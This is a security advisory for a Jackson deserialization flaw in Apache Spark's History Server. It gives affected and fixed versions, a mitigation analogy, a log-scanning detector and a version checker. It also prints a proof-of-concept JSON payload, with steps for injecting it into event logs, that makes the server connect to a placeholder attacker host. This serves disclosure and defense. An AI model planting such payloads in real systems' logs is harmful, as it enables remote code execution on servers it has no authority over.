This issue affects Apache Spark versions before 3.5.7, and 4.0.x versions before 4.0.1. Users are recommended to upgrade to version 3.5.7, 4.0.1, or later, which fixes the issue.
Summary
Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.
Details
The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization, configured with @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS), on SparkListenerEvent objects, so an attacker can specify arbitrary class names in the "Event" field of the event JSON. This permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.
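The pattern can be illustrated with a small Python analogy. This is not Spark or Jackson code: ListenerEvent, JobStart, REGISTRY, and the function names are hypothetical stand-ins. The sketch contrasts a resolver that loads whatever class the input names with one that accepts only registered event types. It shows the general mitigation idea and makes no claim about how the Spark fix is implemented.

```python
import importlib


class ListenerEvent:
    """Stand-in base class, playing the role of SparkListenerEvent."""


class JobStart(ListenerEvent):
    def __init__(self, job_id):
        self.job_id = job_id


def resolve_unchecked(type_id):
    """Load whatever class the input names (the risky pattern)."""
    module_name, _, class_name = type_id.rpartition(".")
    return getattr(importlib.import_module(module_name), class_name)


# Explicit registry of the event types the reader is prepared to build.
REGISTRY = {"JobStart": JobStart}


def resolve_registered(type_id):
    """Accept only type ids that appear in the registry."""
    try:
        return REGISTRY[type_id]
    except KeyError:
        raise ValueError(f"unexpected event type: {type_id!r}") from None


def decode_event(record):
    """Build an event from a dict such as {"Event": "JobStart", "job_id": 7}."""
    fields = dict(record)
    cls = resolve_registered(fields.pop("Event"))
    return cls(**fields)
```

With the unchecked resolver, the input alone decides which class is loaded, so a record naming subprocess.Popen resolves to that class. With the registry, the same record is rejected before any class is looked up.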
The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
Proof of Concept:
Run Spark with event logging enabled, writing to a writable directory (spark-logs).
Inject the following JSON at the beginning of an event log file:
{
  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}
Start the Spark History Server with logs pointing to the modified directory.
The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.
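As a rough detection aid, existing event logs can be scanned for entries like the one above. The sketch below makes two assumptions: the log is uncompressed with one JSON object per line, and built-in events carry either a short "SparkListener..." name or a fully qualified "org.apache.spark." class name. Applications that post custom listener events from other packages will produce false positives, and the prefix check is a heuristic, not a complete defense. The function name suspicious_events is hypothetical.

```python
import json

# Assumption: built-in Spark events use one of these name prefixes.
# Custom listeners may legitimately use other packages.
EXPECTED_PREFIXES = ("SparkListener", "org.apache.spark.")


def suspicious_events(lines, expected_prefixes=EXPECTED_PREFIXES):
    """Yield (line_number, event_name) for entries with unexpected names.

    event_name is None when the line is not valid JSON or has no
    string-valued "Event" field.
    """
    for number, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            yield number, None
            continue
        name = record.get("Event") if isinstance(record, dict) else None
        if not isinstance(name, str):
            yield number, None
        elif not name.startswith(expected_prefixes):
            yield number, name
```

Passing an open file object for an event log to suspicious_events yields the line numbers worth inspecting by hand. Compressed logs would need to be decompressed first.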
Impact
An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
| Software | From | Fixed in |
|---|---|---|
| org.apache.spark / spark-core_2.13 | 4.0.0 | 4.0.1 |
| org.apache.spark / spark-core_2.13 | - | 3.5.7 |
| org.apache.spark / spark-core_2.12 | - | 3.5.7 |
| org.apache.spark / spark-core_2.11 | - | 2.4.8.x |
| org.apache.spark / spark-core_2.10 | - | 2.2.3.x |
| org.apache.spark / spark-core_2.9.3 | - | 0.8.1-incubating.x |
| apache / spark | - | 3.5.7 |
| apache / spark | 4.0.0 | 4.0.0.x |
| apache / spark | 4.0.0-rc1 | 4.0.0-rc1.x |
| apache / spark | 4.0.0-rc2 | 4.0.0-rc2.x |
| apache / spark | 4.0.0-rc3 | 4.0.0-rc3.x |
| apache / spark | 4.0.0-rc4 | 4.0.0-rc4.x |
| apache / spark | 4.0.0-rc5 | 4.0.0-rc5.x |
| apache / spark | 4.0.0-rc6 | 4.0.0-rc6.x |
| apache / spark | 4.0.0-rc7 | 4.0.0-rc7.x |
| apache / spark | 4.0.1-rc1 | 4.0.1-rc1.x |
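The version ranges can be checked programmatically when auditing many deployments. The following is a minimal sketch, assuming plain major.minor.patch version strings with an optional suffix. The helper names parse_version and is_affected are hypothetical. Any suffix (such as -rc1 or -SNAPSHOT) on a fixed version number is conservatively treated as affected, which matches the release-candidate rows in the table but may misclassify vendor-patched builds.

```python
import re

# Fixed releases as stated in the advisory.
FIXED_BEFORE_4 = (3, 5, 7)
FIXED_4_LINE = (4, 0, 1)


def parse_version(text):
    """Return ((major, minor, patch), has_suffix) for strings like '4.0.1-rc1'."""
    match = re.match(r"^(\d+)\.(\d+)\.(\d+)(.*)$", text.strip())
    if match is None:
        raise ValueError(f"unrecognized version: {text!r}")
    base = tuple(int(part) for part in match.group(1, 2, 3))
    return base, bool(match.group(4))


def is_affected(text):
    """Apply the advisory's ranges: before 3.5.7, or 4.x before 4.0.1."""
    base, has_suffix = parse_version(text)
    fixed = FIXED_4_LINE if base[0] >= 4 else FIXED_BEFORE_4
    # Assumption: a suffixed build of a fixed version (e.g. 4.0.1-rc1)
    # is treated as affected.
    return base < fixed or (base == fixed and has_suffix)
```

For example, is_affected("3.5.6") and is_affected("4.0.0") return True, while is_affected("3.5.7") and is_affected("4.0.1") return False.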